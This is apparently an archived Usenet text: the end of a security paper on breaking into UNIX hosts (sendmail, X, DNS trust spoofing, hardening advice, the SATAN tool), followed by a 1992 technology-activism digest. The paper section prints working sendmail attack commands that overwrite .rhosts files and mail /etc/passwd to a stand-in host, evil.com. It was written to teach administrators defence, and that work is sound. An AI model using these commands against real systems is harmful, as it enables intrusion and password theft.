rsh access, allowing you to start X client programs in the victim's
terminal with the output appearing on your own screen:
evil % xhost +xvictim.victim.com
evil % rsh xvictim.victim.com telnet victim.com -display evil.com
In any case, give as much thought to your window security as your
filesystem and network utilities, for it can compromise your system as
surely as a "+" in your hosts.equiv or a passwordless (root) account.
----
Next, you examine sendmail. Sendmail is a very complex program that has
a long history of security problems, including the infamous "wiz"
command (hopefully long since disabled on all machines). You can often
determine the OS, sometimes down to the version number, of the target,
by looking at the version number returned by sendmail. This, in turn,
can give you hints as to how vulnerable it might be to any of the
numerous bugs. In addition, you can see if they run the "decode" alias,
which has its own set of problems:
evil % telnet victim.com 25
connecting to host victim.com (128.128.128.1.), port 25
connection open
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
Running the "decode" alias is a security risk -- it allows potential
attackers to overwrite any file that is writable by the owner of that
alias -- often daemon, but potentially any user. Consider this piece of
mail -- this will place "evil.com" in user zen's .rhosts file if it is
writable:
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail dec...@victim.com
If no home directories are known or writable, an interesting variation
of this is to create a bogus /etc/aliases.pag file that contains an
alias with a command you wish to execute on your target. This may work
since on many systems the aliases.pag and aliases.dir files, which
control the system's mail aliases, are writable to the world.
evil % cat decode
bin: "| cat /etc/passwd | mail z...@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail dec...@victom.com
evil % /usr/lib/sendmail -fbin -om -oi b...@victim.com < /dev/null
A lot of things can be found out by just asking sendmail if an address
is acceptable (vrfy), or what an address expands to (expn). When the
finger or rusers services are turned off, vrfy and expn can still be
used to identify user accounts or targets. Vrfy and expn can also be
used to find out if the user is piping mail through any program that
might be exploited (e.g. vacation, mail sorters, etc.). It can be a
good idea to disable the vrfy and expn commands: in most versions, look
at the source file srvrsmtp.c, and either delete or change the two lines
in the CmdTab structure that have the strings "vrfy" and "expn". Sites
without source can still disable expn and vrfy by just editing the
sendmail executable with a binary editor and replacing "vrfy" and "expn"
with blanks. Acquiring a recent version of sendmail (see Appendix D) is
also an extremely good idea, since there have probably been more
security bugs reported in sendmail than in any other UNIX program.
----
As a sendmail-sendoff, there are two fairly well known bugs that should
be checked into. The first was definitely fixed in version 5.59 from
Berkeley; despite the messages below, for versions of sendmail previous
to 5.59, the "evil.com" gets appended, despite the error messages, along
with all of the typical mail headers, to the file specified:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
evil % /bin/sh evil_sendmail
Trying 128.128.128.1
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
evil % rlogin victim.com -l zen
Welcome to victim.com!
victim %
The second hole, fixed only recently, permitted anyone to specify
arbitrary shell commands and/or pathnames for the sender and/or
destination address. Attempts to keep details secret were in vain, and
extensive discussions in mailing lists and usenet news groups led to
disclosure of how to exploit some versions of the bug. As with many
UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
since they all share a common source code tree ancestry. Space
precludes us from discussing it fully, but a typical attack to get the
password file might look like this:
evil % telnet victim.com 25
Trying 128.128.128.1...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail z...@evil.com < /etc/passwd"
250 "|/bin/mail z...@evil.com < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
evil %
At the time of writing, version 8.6.10 of sendmail (see Appendix D for
information on how to get this) is reportedly the only variant of
sendmail with all of the recent security bugs fixed.
Trust
-----
For our final topic of vulnerability, we'll digress from the practical
strategy we've followed previously to go a bit more into the theoretical
side, and briefly discuss the notion of trust. The issues and
implications of vulnerabilities here are a bit more subtle and
far-reaching than what we've covered before; in the context of this
paper we use the word trust whenever there is a situation when a server
(note that any host that allows remote access can be called a server)
can permit a local resource to be used by a client without password
authentication when password authentication is normally required. In
other words, we arbitrarily limit the discussion to clients in disguise.
There are many ways that a host can trust: .rhosts and hosts.equiv files
that allow access without password verification; window servers that
allow remote systems to use and abuse privileges; export files that
control access via NFS, and more.
Nearly all of these rely on client IP address to hostname conversion to
determine whether or not service is to be granted. The simplest method
uses the /etc/hosts file for a direct lookup. However, today most hosts
use either DNS (the Domain Name Service), NIS, or both for name lookup
service. A reverse lookup occurs when a server has an IP address (from
a client host connecting to it) and wishes to get the corresponding
client hostname.
Although the concept of how host trust works is well understood by most
system administrators, the _dangers_ of trust, and the _practical_
problem it represents, irrespective of hostname impersonation, is one of
the least understood problems we know of on the Internet. This goes far
beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
systems -- indeed, much of the useful services in UNIX are based on the
concept that well known (to an administrator or user) sites are trusted
in some way. What is not understood is how networking so tightly binds
security between what are normally considered disjoint hosts.
Any form of trust can be spoofed, fooled, or subverted, especially when
the authority that gets queried to check the credentials of the client
is either outside of the server's administrative domain, or when the
trust mechanism is based on something that has a weak form of
authentication; both are usually the case.
Obviously, if the host containing the database (either NIS, DNS, or
whatever) has been compromised, the intruder can convince the target
host that s/he is coming from any trusted host; it is now sufficient to
find out which hosts are trusted by the target. This task is often
greatly helped by examining where system administrators and system
accounts (such as root, etc.) last logged in from. Going back to our
target, victim.com, you note that root and some other system accounts
logged in from big.victim.com. You change the PTR record for evil.com so
that when you attempt to rlogin in from evil.com to victim.com,
victim.com will attempt to look up your hostname and will find what you
placed in the record. If the record in the DNS database looks like:
1.192.192.192.in-addr.arpa IN PTR evil.com
And you change it to:
1.192.192.192.in-addr.arpa IN PTR big.victim.com
then, depending on how naive victim.com's system software is, victim.com
will believe the login comes from big.victim.com, and, assuming that
big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
able to login without supplying a password. With NIS, it is a simple
matter of either editing the host database on the NIS master (if this is
controlled by the intruder) or of spoofing or forcing NIS (see
discussion on NIS security above) to supply the target with whatever
information you desire. Although more complex, interesting, and
damaging attacks can be mounted via DNS, time and space don't allow
coverage of these methods here.
Two methods can be used to prevent such attacks. The first is the most
direct, but perhaps the most impractical. If your site doesn't use any
trust, you won't be as vulnerable to host spoofing. The other strategy
is to use cryptographic protocols. Using the secure RPC protocol (used
in secure NFS, NIS+, etc.) is one method; although it has been "broken"
cryptographically, it still provides better assurance than RPC
authentication schemes that do not use any form of encryption. Other
solutions, both hardware (smartcards) and software (Kerberos), are being
developed, but they are either incomplete or require changes to system
software.
Appendix B details the results of an informal survey taken from a
variety of hosts on the Internet.
Protecting the system
---------------------
It is our hope that we have demonstrated that even some of the most
seemingly innocuous services run can offer (sometimes unexpectedly)
ammunition to determined system crackers. But, of course, if security
were all that mattered, computers would never be turned on, let alone
hooked into a network with literally millions of potential intruders.
Rather than reiterating specific advice on what to switch on or off, we
instead offer some general suggestions:
o If you cannot turn off the finger service, consider installing a
modified finger daemon. It is rarely necessary to reveal a user's home
directory and the source of last login.
o Don't run NIS unless it's absolutely necessary. Use NFS as little
as possible.
o Never export NFS filesystems unrestricted to the world. Try to
export file systems read-only where possible.
o Fortify and protect servers (e.g. hosts that provide a service to
other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
accounts on these hosts.
o Examine carefully services offered by inetd and the portmapper.
Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
wrappers, if for no other reason than to log the sources of connections
to your host. This adds immeasurably to the standard UNIX auditing
features, especially with respect to network attacks. If possible, use
the loghost mechanism of syslog to collect security-related information
on a secure host.
o Eliminate trust unless there is an absolute need for it. Trust is
your enemy.
o Use shadow passwords and a passwd command that disallows poor
passwords. Disable or delete unused/dormant system or user accounts.
o Keep abreast of current literature (see our suggested reading list and
bibliography at the end of this paper) and security tools; communicate
to others about security problems and incidents. At minimum, subscribe
to the CERT mailing list and phrack magazine (plus the firewalls mailing
list, if your site is using or thinking about installing a firewall) and
read the usenet security newsgroups to get the latest information on
security problems. Ignorance is the deadliest security problem we are
aware of.
o Install all vendor security patches as soon as possible, on all of
your hosts. Examine security patch information for other vendors - many
bugs (rdist, sendmail) are common to many UNIX variants.
It is interesting to note that common solutions to security problems
such as running Kerberos or using one-time passwords or digital tokens
are ineffective against most of the attacks we discuss here. We
heartily recommend the use of such systems, but be aware that they are
_not_ a total security solution -- they are part of a larger struggle to
defend your system.
Conclusions
-----------
Perhaps none of the methods shown here are surprising; when writing this
paper, we didn't learn very much about how to break into systems. What
we _did_ learn was, while testing these methods out on our own systems
and that of friendly sites, just how effective this set of methods is
for gaining access to a typical (UNIX) Internet host. Tiring of trying
to type these in all by hand, and desiring to keep our own systems more
secure, we decided to implement a security tool (SATAN) that attempts to
check remote hosts for at least some of the problems discussed here.
The typical response, when telling people about our paper and our tool
was something on the order of "that sounds pretty dangerous -- I hope
you're not going to give it out to everybody. But you since you can
trust me, may I have a copy of it?"
We never set out to create a cookbook or toolkit of methods and programs
on how to break into systems -- instead, we saw that these same methods
were being used, every day, against ourselves and against friendly
system administrators. We believe that by propagating information that
normally wasn't available to those outside of the underworld, we can
increase security by raising awareness. Trying to restrict access to
"dangerous" security information has never seemed to be a very effective
method for increasing security; indeed, the opposite appears to be the
case, since the system crackers have shown little reticence to share
their information with each other.
While it is almost certain that some of the information presented here
is new material to (aspiring) system crackers, and that some will use it
to gain unauthorized entrance onto hosts, the evidence presented even by
our ad hoc tests shows that there is a much larger number of insecure
sites, simply because the system administrators don't know any better --
they aren't stupid or slow, they simply are unable to spend the very
little free time that they have to explore all of the security issues
that pertain to their systems. Combine that with no easy access to this
sort of information and you have poorly defended systems. We (modestly)
hope that this paper will provide badly-needed data on how systems are
broken into, and further, to explain _why_ certain steps should be taken
to secure a system. Knowing why something is a problem is, in our
opinion, the real key to learning and to making an informed, intelligent
choice as to what security really means for your site.
----
Appendix A:
SATAN (Security Analysis Tool for Auditing Networks)
Originally conceived some years ago, SATAN is actually the prototype of
a much larger and more comprehensive vision of a security tool. In its
current incarnation, SATAN remotely probes and reports various bugs and
weaknesses in network services and windowing systems, as well as
detailing as much generally useful information as possible about the
target(s). It then processes the data with a crude filter and what
might be termed an expert system to generate the final security
analysis. While not particularly fast, it is extremely modular and easy
to modify.
SATAN consists of several sub-programs, each of which is an executable
file (perl, shell, compiled C binary, whatever) that tests a host for a
given potential weakness. Adding further test programs is as simple as
putting an executable into the main directory with the extension ".satan";
the driver program will automatically execute it. The driver generates
a set of targets (using DNS and a fast version of ping together to get
"live" targets), and then executes each of the programs over each of the
targets. A data filtering/interpreting program then analyzes the
output, and lastly a reporting program digests everything into a more
readable format.
The entire package, including source code and documentation, has been
made freely available to the public, via anonymous ftp and by posting it
to one of the numerous source code groups on the Usenet.
----
Appendix B:
An informal survey conducted on about a dozen Internet sites
(educational, military, and commercial, with over 200 hosts and 40000
accounts) revealed that on the average, close to 10 percent of a site's
accounts had .rhosts files. These files averaged six trusted hosts
each; however, it was not uncommon to have well over one hundred entries
in an account's .rhosts file, and on a few occasions, the number was
over five hundred! (This is not a record one should be proud of
owning.) In addition, _every_ site directly on the internet (one site
was mostly behind a firewall) trusted a user or host at another site --
thus, the security of the site was not under the system administrators
direct control. The larger sites, with more users and hosts, had a
lower percentage of users with .rhosts files, but the size of .rhosts
files increased, as well as the number of trusted off-site hosts.
Although it was very difficult to verify how many of the entries were
valid, with such hostnames such as "Makefile", "Message-Id:", and
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
question the wisdom of putting a site's security in the hands of its
users. Many users (especially the ones with larger .rhosts files)
attempted to put shell-style comments in their .rhosts files, which most
UNIX systems attempt to resolve as valid host names. Unfortunately, an
attacker can then use the DNS and NIS hostname spoofing techniques
discussed earlier to set their hostname to "#" and freely log in. This
puts a great many sites at risk (at least one major vendor ships their
systems with comments in their /etc/hosts.equiv files.)
You might think that these sites were not typical, and, as a matter of
fact, they weren't. Virtually all of the administrators knew a great
deal about security and write security programs for a hobby or
profession, and many of the sites that they worked for did either
security research or created security products. We can only guess at
what a "typical" site might look like.
----
Appendix C:
After receiving mail from a site that had been broken into from one of
our systems, an investigation was started. In time, we found that the
intruder was working from a list of ".com" (commercial) sites, looking
for hosts with easy-to steal password files. In this case,
"easy-to-steal" referred to sites with a guessable NIS domainname and an
accessible NIS server. Not knowing how far the intruder had gotten, it
looked like a good idea to warn the sites that were in fact vulnerable
to password file theft. Of the 656 hosts in the intruder's hit list, 24
had easy-to-steal password files -- about one in twenty-five hosts! One
third of these files contained at least one password-less account with
an interactive shell. With a grand total of 1594 password-file entries,
a ten-minute run of a publically-available password cracker (Crack)
revealed more than 50 passwords, using nothing but a low-end Sun
workstation. Another 40 passwords were found within the next 20
minutes; and a root password was found in just over an hour. The result
after a few days of cracking: five root passwords found, 19 out of 24
password files (eighty percent) with at least one known password, and
259 of 1594 (one in six) passwords guessed.
----
Appendix D:
How to get some free security resources on the Internet
Mailing lists:
o The CERT (Computer Emergency Response Team) advisory mailing list.
Send e-mail to ce...@cert.org, and ask to be placed on their mailing
list.
o The Phrack newsletter. Send an e-mail message to
phr...@well.sf.ca.us and ask to be added to the list.
o The Firewalls mailing list. Send the following line to
majo...@greatcircle.com:
subscribe firewalls
o Computer Underground Digest. Send e-mail to
tk0...@mvs.cso.niu.edu, asking to be placed on the list.
Free Software:
COPS (Computer Oracle and Password System) is available via anonymous
ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
in pub/security.
Crack is available from ftp.uu.net, in /usenet/comp.sources.misc/volume28.
TAMU is a UNIX auditing tool that is part of a larger suite of excellent
tools put out by a group at the Texas A&M University. They can be
gotten via anonymous ftp at net.tamu.edu, in pub/security/TAMU.
Sources for ftpd and many other network utilities can be found in
ftp.uu.net, in packages/bsd-sources.
Source for ISS (Internet Security Scanner), a tool that remotely scans
for various network vulnerabilities, is available via anonymous ftp from
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
Securelib is available via anonymous ftp from ftp.uu.net, in
usenet/comp.sources.misc/volume36/securelib.
The latest version of berkeley sendmail is available via anonymous ftp
from ftp.cs.berkeley.edu, in ucb/sendmail.
Tripwire, a UNIX filesystem integrity checker+, is available via anonymous
ftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire.
----
Bibliography:
Baldwin, Robert W., Rule Based Analysis of Computer Security,
Massachusetts Institute of Technology, June 1987.
Bellovin, Steve, Using the Domain Name System for System Break-ins,
1992 (unpublished).
Massachusetts Institute of Technology, X Window System Protocol,
Version 11, 1990.
Shimomura, Tsutomu, private communication.
Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
----
Suggested reading:
Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
Computer Communication Review 19 (2), 1989; a comment by Stephen
Kent appears in volume 19 (3), 1989.
Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security",
O'Reilly and Associates, Inc., 1992.
Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
Study: Network Information Service", Computer Communication Review
22 (5) 1992.
Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
Four, Issue Forty-Three, File 14 of 27.
Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
1993.
Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
Protocal", Purdue University, August 1993.
Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
27 (8), 1984.
--
Si
Smaug
funny how one minute people are posting asskissing praise and the next they are
continuing with that unpleasant noise.
the druid is not pleased.
--
The Art of Technology Digest #6 Friday, October 16th, 1992
%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%%%AoT%%
Editor: Chris Cappuccio (chris%aot...@mcnnet.mi.org)
BBS Archivist: David Mitchell (dave%aot...@mcnnet.mi.org)
E-Mail Archivist: Mike Batchelor (mi...@batpad.lgb.ca.us)
[AoT Digest] Contents #6 (Fri, October 16th, 1992)
Article 1: SEMATECH Campaign in NYT
Article 2: EFF announces gopher access to their online documents
Article 3: Call for SEMATECH Advisory Participants
Article 4: Computer Help Needed for Human-Rights Project
Article 5: CPSR Social Action Report
Article 6: Beta Testers Needed for Security Tool
Article 7: Linux 0.98.1 Information
Article 8: Fixed Problems With The aotd Mailserver
The Art of Technology Digest is distributed in the following ways:
By E-MAIL, send e-mail to mail...@batpad.lgb.ca.us and, to subscribe to
Art of Technology Digest, leave the subject blank and enter: SUBSCRIBE aotd.
To get a back-issue of Art of Technology Digest, leave subject blank and
enter: GET aotd/vol<number>.zoo UUENCODE (Example: To get AOT-D number 2,
use GET aotd/vol2.zoo UUENCODE). To get an index of Art of Technology Digest,
leave subject blank and enter: INDEX. To get AoT-D by BBS, Call
+1 313 464 1470, Live Wire BBS. This system maintains a complete collection
of AoT Digest. Speeds are 1200/2400/HST-9600/HST-14,400.
Or, if you have Internet FTP Access, the anonymous FTP site is:
wuarchive.wustl.edu, under directory: /pub/aot/
The Art of Technology Digest is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views. AoT-D material may be reprinted as long as the source
is cited. Some authors do copyright their material, and they should
be contacted for reprint permission. It is assumed that non-personal
mail at the moderators may be reprinted unless otherwise specified.
Readers are encouraged to submit reasoned articles relating to
computer culture and communication. Articles are preferred to short
responses. Please avoid quoting previous posts unless absolutely
necessary. All articles for submission should be sent to:
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Digest contributors assume all
responsibility for ensuring that articles submitted do not
violate copyright protections.
"AT&T is a modem reset command"
-- Anonymous
---------------------------------------------------------------------------
Date: Mon, 5 Oct 1992 11:41:24 -0400
From: Gary Chapman <cha...@silver.lcs.mit.edu>
Subject: Article 1--SEMATECH Campaign in NYT
The first page of the business section in The New York Times today
(October 5th) features an article on the work of the Campaign for
Responsible Technology on SEMATECH, the Austin, Texas, research
consortium. The article is by John Markoff and is titled "Sematech's
New Mission Is Defined." The first paragraph says:
Congress took the unusual step over the weekend of mandating
that 10 percent of the Sematech computer chip consortium's
$100 million 1993 budget be used for environmental research.
This is not quite accurate, because SEMATECH's total budget is $200
million per year; the $100 million figure is the federal government's
contribution to the budget, of which $10 million is now dedicated to
environmental R&D. And although it is true that $10 million is 10% of
$100 million, the legislation does not mandate 10%, which we suggested
as a standing recommendation for every annual authorization, but instead
only $10 million for FY 1993.
The article reports that the House language that earmarked the $10
million authorization that was a result of CRT work was retained in the
conference committee version of the Defense Authorization Bill finalized
this past weekend.
Ted Smith and Susana Almanza of CRT are quoted in the article. Susana
is identified as the spokeswoman for People in Defense of the Earth and
its Resources, PODER, the environmental organization in East Austin that
grew out of the SEMATECH campaign.
Ted Smith, Susana Almanza, and CRT coordinator Rand Wilson are in Austin
today to hold a press conference and a meeting with the editorial board
of the Austin American-Statesman, the leading local newspaper. The
newspaper has been mildly hostile to CRT work in the past, and generally
favors the semiconductor industry.
The passage of this authorization for SEMATECH is a major victory for
public interest activism in the United States. To our knowledge, this
is the first time a public interest coalition has had a significant
impact on the research content of a major Pentagon-financed R&D
facility. The work that has been done around SEMATECH can be used as a
model for democratic, participatory policymaking all over the country.
The organizers of this effort deserve thanks and congratulations from
everyone concerned about the character of democracy in the United
States.
To contact Ted Smith, chairman of the Campaign for Responsible
Technology, call (408) 287-6707, or write him on e-mail at
tsm...@igc.org.
To contact Susana Almanza, call her at the Texas Center for Policy
Studies, (512) 474-0811.
For more information about CRT and the SEMATECH campaign, contact Rand
Wilson at (617) 391-3866 or write him on e-mail at rwi...@igc.org.
I will also be happy to answer questions about the campaign.
Future tasks for the SEMATECH campaign include getting the consortium's
private partners to match the federal funds in order to generate another
$10 million in funding for environmental and labor safety R&D in FY 93,
and then to form public interest advisory committees to help PODER and
CRT activists monitor how SEMATECH spends the money it has been given by
Congress. Please get in touch if you are interested in helping out with
either of these tasks.
Gary Chapman
Coordinator
The 21st Century Project
Computer Professionals for Social Responsibility
Cambridge, Massachusetts
cha...@lcs.mit.edu
------------------------------
Date: Tue, 6 Oct 1992 18:19:42 -0400
From: Christopher Davis <c...@eff.org>
Subject: Article 2--EFF announces gopher access to their online documents
+=========+==================================================+==============+
| F.Y.I. | Newsnote from the Electronic Frontier Foundation | Oct 6, 1992 |
+=========+==================================================+==============+
ELECTRONIC FRONTIER FOUNDATION OPENS GOPHER SERVER TO THE INTERNET
The Electronic Frontier Foundation announced today that they now offer
access to their online document library via the Internet Gopher protocol,
developed at the University of Minnesota. Gopher access joins WAIS,
electronic mail service, and anonymous ftp as an electronic means of
access to EFF documents.
Gopher clients are available for Mac, NeXT, GNU Emacs, X11, VM/CMS, VMS,
and curses interfaces. Many of these are available for anonymous ftp from
boombox.micro.umn.edu in pub/gopher. Those without clients can telnet to
consultant.micro.umn.edu and login as "gopher" to try it out. (EFF's
Gopher server is listed under "Other Gopher and Information Servers".)
The EFF Gopher service is available on gopher.eff.org, port 70. WAIS
access is available on wais.eff.org, port 210. Anonymous ftp access to
the document library is available on ftp.eff.org, in directory pub/EFF.
Mail service is handled through archive...@eff.org; use "index eff"
for a list of documents and document sections.
For more information on the EFF or online access to our documents, send
electronic or postal mail to the addresses below.
+=====+=======================================================+=============+
| EFF | 155 Second Street, Cambridge MA 02141 +1 617 864 0665 | e...@eff.org |
+=====+=======================================================+=============+
------------------------------
Date: Thu, 8 Oct 1992 09:14:27 -0400
From: Gary Chapman <cha...@silver.lcs.mit.edu>
Subject: Article 3--Call for SEMATECH Advisory Participants
Campaign for Responsible Technology
Sustainable Industry Policy Development at SEMATECH
ADVISORS NEEDED!
The semiconductor industry is often touted as a "clean" industry, but in
fact uses some of the most dangerous materials in existence and has
been the source of unprecedented environmental degradation and workplace
hazards. One of the major "footprints" of the industry's development
has been substantial groundwater contamination. Exposure to toxic
chemicals in the workplace and surrounding communities has been linked
to cancer, central nervous system damage, birth defects and deaths. CRT
and Southwest Network for Environmental and Economic Justice are
collaborating on an Electronics Industry Good Neighbor Campaign. Last
Summer, community organizations participated in a grass-roots assessment
of the impact of the semiconductor industry on their communities that
confirmed widespread occupational and environmental problems. Further,
the assessment identified serious concerns about employment
discrimination and the uneven benefits of the industry's economic
development for the community.
Seeking to solutions for these problems, the Campaign for Responsible
Technology (CRT) successfully helped to amend the FY '93 congressional
funding re-authorizing SEMATECH to include $10 million for research on
environmentally safe manufacturing methods.
The groups are also asking SEMATECH's private sector partners*--thirteen
of the largest semiconductor manufacturers in the U.S.--to match the
taxpayer's $10 million by similarly earmarking 10 percent of their
SEMATECH contribution for environmentally safe manufacturing methods.
That would create a $20 million research fund at SEMATECH that could
directly address the problems experienced by semiconductor workers and
the communities where the production facilities are located. The
challenge for CRT is to develop a well-conceived research agenda that
would fulfill this promise. CRT will initiate a "shadow advisory
committee" to develop a $20 million research agenda for SEMATECH and to
establish a "yard stick" that will influence SEMATECH officials on how
the money will be spent in fiscal year 1993. There are three components
to this committee:
1) A task force on environmentally responsible manufacturing in the
semiconductor industry;
2) A task force on community development, to ensure that communities
chosen as the sites for new semiconductor fabrication plants, or
communities hoping to attract such plants, can have expert advice on
how to manage the development process to attain maximum community
benefit.
3) A task force on labor, to promote high skilled jobs and new forms of
work organization in the semiconductor industry.
Participants in the three advisory task forces will be drawn from CRT's
advisory board and other nationally recognized experts in these fields.
The task forces are will not seek to answer these questions on their
own. Rather, each would identify questions that SEMATECH researchers
should be asking in order to comply with the needs of CRT and the
Electronics Industry Good Neighbor Campaign's needs.
The three task forces will serve as guides for the research to be
conducted at SEMATECH; they will determine the most important research
questions and suggest qualified professionals who could competently help
SEMATECH arrive at good policies.
The task forces will not deal directly with SEMATECH officials, but
serve as an expert resource for the grassroots organizers who have
conducted this campaign and who will continue to monitor SEMATECH's
performance.
CRT plans to organize a conference in early 1993 where each of the task
forces will present their findings to representatives of organizations
participating in the Electronics Industry Good Neighbor Campaign and or
members of the Southwest Network for Environmental and Economic Justice.
After evaluating the research design proposed by the task forces, CRT
and the Electronics Industry Good Neighbor Campaign will present the
proposals to SEMATECH. CRT is looking for technical people to serve on
these taskforces. Anyone interested should contact:
Rand Wilson
Director
Campaign for Responsible Technology
408 Highland Ave.
Somerville, MA 02144
(617) 391-3866
rwi...@igc.com
Gary Chapman
Coordinator
The 21st Century Project
Computer Professionals for Social Responsibility
22 Kidder Ave. #2
Somerville, MA 02144
(617) 625-6985
cha...@lcs.mit.edu
* The 12 member companies are Advanced Micro Devices, AT&T, Digital
Equipment, Harris, Hewlett Packard, Intel, IBM, LSI Logic, Motorola,
National Semiconductor, Rockwell, Texas Instruments.
------------------------------
Date: Fri, 9 Oct 1992 13:35:00 EDT
From: Jeff Johnson <jjoh...@hpljaj.hpl.hp.com>
Subject: Article 4--Computer Help Needed for Human-Rights Project
----------------------------Original message----------------------------
Request for computer assistance:
The Human Rights Committee of the American Association for the
Advancement of Science would like to find a person having computer
programming skills to help with a project. They are tracking
human-rights violations in El Salvador, and, via computer, analyzing
the violations with respect to Army movements. They need someone to
help program the system.
Persons interested in volunteering or helping should contact:
Daniel Falsedo
202-326-6615
------------------------------
Date: Fri, 9 Oct 1992 13:40:01 EDT
From: Jeff Johnson <jjoh...@hpljaj.hpl.hp.com>
Subject: Article 5--CPSR Social Action Report
----------------------------Original message----------------------------
Towards a Guide to Social Action for Computer Professionals
By Jeff Johnson, Chair, and Evelyn Pine, Managing Director,
Computer Professionals for Social Responsibility (CPSR)
Introduction
"Being a typical nerd programmer, it's always been comforting to believe
that somehow whatever I was working on in the darkness of my cubicle
would eventually benefit the world. ... I focused on what was
interesting to me, assuming that it would also be important to the
world. But the events in L.A. have forced me to think that maybe it
doesn't work that way; and to confront the question: what can I, as a
professional in the HCI field, do to help change what's going on in the
world?" -- a CHI'92 attendee.
The Rodney King video, trial, verdict, and subsequent riots jolted
Americans in many ways besides showing us acts of violence committed by
police and citizens. It also made the inequities of American society
painfully clear, and provided a clear response to Langston Hughes'
question: "What happens to a dream deferred?" Answer: it explodes.
This caused many people to rethink how they are conducting their lives,
and how we are conducting our neighborhoods, our cities, our states,
and our nation.
Computer professionals have a relatively comfortable position in this
society. For the most part, we are well-paid, and our jobs are more
secure than most. As a result, we live in nicer neighborhoods, send
our kids to better schools, eat healthier food, use better tools, and
have access to better health care. Because of this, some of us feel a
responsibility to help those in our society who aren't so well-off, and
some of us don't.
However, computer professionals are not just another well-paid segment
of society. We, more than people in most other lines of work, create
world-changing technology, technology that profoundly affects how
people live, work, and die. We can create technology that, e.g., can
be used to improve neighborhoods, education, food production and
distribution, tools, and health care. We can also create technology
that can be used to keep the poor out of our neighborhoods and schools,
produce and sell junk food and worthless tools, and limit access to
health care, as well as keep the lid on discontent and even kill people
more efficiently.
Computer technology can help reduce inequity and it can also help
exacerbate it. The public learned of the King beating because of
technology in the hands of citizens. Today anyone with a PC, an
ink-jet printer, and a copier can produce documents that political
activists of just thirty years ago, cranking out smelly typewritten
ditto copies, never imagined. Citizens of China and Thailand used fax,
video, and electronic mail to document government repression of
democratic movements. Computer technology is a crucial ingredient of
all of the above, in their design and manufacture as well as in the
tools themselves.
Unfortunately, the effect of introducing computer technology has more
often been to increase the stratification of society. Let's face it:
computer systems often lead to loss of jobs. Furthermore, as the
infrastructure upon which society is based becomes more dependent upon
computer technology, those without technical skills are left behind.
The end of the Cold War and the recession, combined with the
introduction of computer technology, have served to exacerbate
joblessness and hopelessness for those who have been rendered
superfluous and don't have the education to become "knowledge workers."
"How many of the projects that are funded will have a net result of
reducing jobs -- particularly jobs for less-educated people? ...
I find many in the computer industry have defensive rationalizations
for the fact that their own labor will result in the loss of jobs to
society. ... The up and coming area of software that I myself work
in -- workflow -- will automate people out of work. ... How do we
deal with this?" -- A CHI'92 attendee.
This special relationship between computer technology and society gives
those who develop it -- us -- responsibilities beyond any that arise
merely from our comfortable economic status. To quote from the
statement of purpose of Computer Professionals for Social
Responsibility (CPSR): "Decisions regarding the development and use of
computers ... have far-reaching consequences and reflect basic values
and priorities. We believe that computer technology should make life
more enjoyable, productive, and secure."
The King riots jolted us, causing many of us to reflect on whether we
are living up to our responsibilities as citizens and as computer
professionals. The contrast between the world we inhabit, of which the
CHI'92 conference is a part, and the one that exploded into violence
and flames the week before the conference, caused some of us to feel a
certain alienation from our work, as the opening quotation of this
article illustrates. Are we part of the solution, or part of the
problem? Also, as the effects of the riots rapidly spread to
surrounding neighborhoods, other cities, and even the presidential
campaign, it became obvious that the two "worlds" aren't really
separate. That burning society we saw on TV wasn't someone else's,
it was ours.
What Can I Do? -- The CPSR/CHI'92 "Social Issues" Session
In the midst of the worst period of rioting, as many of us were
preparing to head to Monterey, the site of CHI'92, Prof. Chris Borgman
of U.C.L.A. sent an e-mail message to several of her acquaintances
across the country, describing what was going on in L.A. and how she
and her friends there felt about it (see Shneiderman, 1992). Prof. Ben
Shneiderman was especially touched by the message. He contacted the
CHI'92 Co-Chairs, Jim Miller and Scooter Morris, and expressed his
desire that the conference should not run its course without
acknowledging the riots and the events that led up to them. Even
though the riots were not directly CHI- or computer-related, he felt
that ignoring them constituted burying our heads in the sand, and would
be morally wrong. Jim and Scooter agreed that something should be
done, but of course by that point the conference schedule was set.
They suggested a special session, during the lunch break just after the
official opening plenary session on Tuesday. Jim also suggested that
CPSR Chair Jeff Johnson be invited to help plan the session.
On Monday evening, Ben and Jeff met to plan the session. What quickly
emerged was a desire not only to acknowledge the distressing external
events and give people a chance to vent their spleens, but also to help
give people the wherewithal to act. To Ben and Jeff, it seemed that
many of their colleagues were angry, upset, worried, or frightened
about what was going on, but didn't know what to do about it, or even
